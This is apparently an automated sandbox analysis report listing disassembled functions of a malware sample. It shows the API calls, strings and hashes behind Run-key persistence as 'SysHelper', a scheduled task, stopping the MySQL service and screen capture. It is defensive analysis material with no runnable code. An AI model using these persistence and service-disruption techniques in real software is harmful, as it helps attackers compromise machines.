                                                                                                    • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                    • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                                                                                                    • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                    • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                    • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                    • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                    • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                                                                                                  • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                                                                                                  • SelectObject.GDI32(?,?), ref: 00482436
                                                                                                  • DeleteObject.GDI32(00000000), ref: 0048243D
                                                                                                  • DeleteDC.GDI32(?), ref: 0048244A
                                                                                                  • DeleteDC.GDI32(?), ref: 00482450
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                  • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                  • API String ID: 151064509-1805842116
                                                                                                  • Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                                  • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                                                                                                  • Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                                  • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _strncmp
                                                                                                  • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                  • API String ID: 909875538-2733969777
                                                                                                  • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                  • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                                  • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                  • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 1503006713-0
                                                                                                  • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                  • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                                                                                                  • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                  • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                                                                                  • _malloc.LIBCMT ref: 0041BBE4
                                                                                                  • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                                                                                                  • _free.LIBCMT ref: 0041BCD7
                                                                                                    • Part of subcall function 00411CD0: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                    • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                                                                                    • Part of subcall function 00411CD0: RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                    • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                    • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                    • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                  • IsWindow.USER32(?), ref: 0041BF69
                                                                                                  • DestroyWindow.USER32(?), ref: 0041BF7B
                                                                                                  • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3873257347-0
                                                                                                  • Opcode ID: 95ce8d5bcbae79598e79a345e2570bf3c9b71037e1cd50604d613cd91e3bc71a
                                                                                                  • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                                                                                                  • Opcode Fuzzy Hash: 95ce8d5bcbae79598e79a345e2570bf3c9b71037e1cd50604d613cd91e3bc71a
                                                                                                  • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00427B21 Relevance: 18.1, APIs: 12, Instructions: 84COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DecodePointer.KERNEL32 ref: 00427B29
                                                                                                  • _free.LIBCMT ref: 00427B42
                                                                                                    • Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                    • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                  • _free.LIBCMT ref: 00427B55
                                                                                                  • _free.LIBCMT ref: 00427B73
                                                                                                  • _free.LIBCMT ref: 00427B85
                                                                                                  • _free.LIBCMT ref: 00427B96
                                                                                                  • _free.LIBCMT ref: 00427BA1
                                                                                                  • _free.LIBCMT ref: 00427BC5
                                                                                                  • EncodePointer.KERNEL32(006D85B0), ref: 00427BCC
                                                                                                  • _free.LIBCMT ref: 00427BE1
                                                                                                  • _free.LIBCMT ref: 00427BF7
                                                                                                  • _free.LIBCMT ref: 00427C1F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 3064303923-0
                                                                                                  • Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                                                                                                  • Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
                                                                                                  • Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                                                                                                  • Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 00411BB0
                                                                                                  • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                                                                                  • CoUninitialize.OLE32 ref: 00411BD0
                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                                                                                  • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                                                                                  • lstrcatW.KERNEL32(?), ref: 00411C44
                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                                                                                  • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                  • String ID: \shell32.dll
                                                                                                  • API String ID: 679253221-3783449302
                                                                                                  • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                  • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                                                                                                  • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                  • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                  • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                  • GetDesktopWindow.USER32 ref: 004549FB
                                                                                                  • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                  • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                  • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                  • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                  • _wcsstr.LIBCMT ref: 00454A8A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                  • String ID: Service-0x$_OPENSSL_isservice
                                                                                                  • API String ID: 2112994598-1672312481
                                                                                                  • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                                  • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                                                                                                  • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                                  • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                                  • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                                                                                                  • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                                    • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                                  • vswprintf.LIBCMT ref: 00454B5D
                                                                                                  • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                                  • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                                  • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                                  • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                  • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                  • API String ID: 277090408-1348657634
                                                                                                  • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                                  • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                                                                                                  • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                                  • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                                  • _memset.LIBCMT ref: 004123B6
                                                                                                  • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                                  • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                                                                                                  • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                                  Strings
                                                                                                  • SysHelper, xrefs: 004123D6
                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                  • API String ID: 122392481-4165002228
                                                                                                  • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                                  • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                                                                                  • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                                  • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                                  • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                                                                                  • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                                  • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                                                                                  • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                                                                                                  • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                                                                                  • _memset.LIBCMT ref: 0040DC38
                                                                                                  • CoUninitialize.OLE32 ref: 0040DC92
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                  • String ID: --Task$Comment$Time Trigger Task
                                                                                                  • API String ID: 330603062-1376107329
                                                                                                  • Opcode ID: a952cf49ba026668ef61038e911d8e9ba8e44f2ebfb21b674e42d3fec6852e8d
                                                                                                  • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                                                                                                  • Opcode Fuzzy Hash: a952cf49ba026668ef61038e911d8e9ba8e44f2ebfb21b674e42d3fec6852e8d
                                                                                                  • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                                                                                  • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                                                                                  • Sleep.KERNEL32(?), ref: 00411A75
                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                  • String ID: MYSQL
                                                                                                  • API String ID: 2359367111-1651825290
                                                                                                  • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                  • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                                                                                                  • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                  • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                                    • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                                  • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                                    • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                                  • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                  • String ID: bad function call
                                                                                                  • API String ID: 2464034642-3612616537
                                                                                                  • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                  • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                                                                                  • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                  • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00423576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 004235B1
                                                                                                    • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                  • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                                  • __gmtime64_s.LIBCMT ref: 00423680
                                                                                                  • __gmtime64_s.LIBCMT ref: 0042369D
